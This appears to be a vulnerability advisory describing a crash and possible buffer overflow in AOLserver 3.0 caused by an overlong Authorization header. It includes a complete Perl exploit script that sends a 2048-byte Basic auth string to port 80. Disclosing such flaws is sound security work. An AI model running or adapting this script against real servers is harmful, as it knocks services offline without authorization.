|
Brought to you by:
Suppliers of:
|
|
|
| |
| AOLserver will crash when it is given a long authorization string. It is also possible this vulnerability will allow an attacker to execute arbitrary code through a buffer overflow. |
| |
Credit:
The information has been provided by Nate Haggard.
|
| |
Vulnerable systems:
AOLserver version 3.0
Immune systems:
AOLserver version 3.4
AOLserver version 3.3.1
Exploit:
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;
|
|
|
|
|
